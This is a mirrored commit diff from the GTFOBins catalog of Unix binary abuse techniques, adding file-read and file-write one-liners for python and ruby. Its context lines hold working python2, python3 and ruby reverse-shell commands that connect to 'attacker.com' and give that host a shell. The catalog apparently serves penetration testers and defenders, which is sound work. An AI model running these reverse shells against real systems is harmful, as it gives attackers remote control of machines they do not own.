mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add read and write to python and ruby
This commit is contained in:
parent
66b617c955
commit
ee57eeba90
@ -28,6 +28,10 @@ functions:
|
|||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
||||||
|
file-read:
|
||||||
|
- code: python2 -c 'open("file_to_read").read()'
|
||||||
|
file-write:
|
||||||
|
- code: python2 -c 'open("file_to_write","w+").write("data")'
|
||||||
load-library:
|
load-library:
|
||||||
- code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
- code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||||
---
|
---
|
||||||
|
@ -28,6 +28,10 @@ functions:
|
|||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
||||||
|
file-read:
|
||||||
|
- code: python3 -c 'open("file_to_read").read()'
|
||||||
|
file-write:
|
||||||
|
- code: python3 -c 'open("file_to_write","w+").write("data")'
|
||||||
load-library:
|
load-library:
|
||||||
- code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
- code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||||
---
|
---
|
||||||
|
@ -15,6 +15,10 @@ functions:
|
|||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||||
|
file-read:
|
||||||
|
- code: ruby -e 'puts File.read("file_to_read")'
|
||||||
|
file-write:
|
||||||
|
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
|
||||||
load-library:
|
load-library:
|
||||||
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user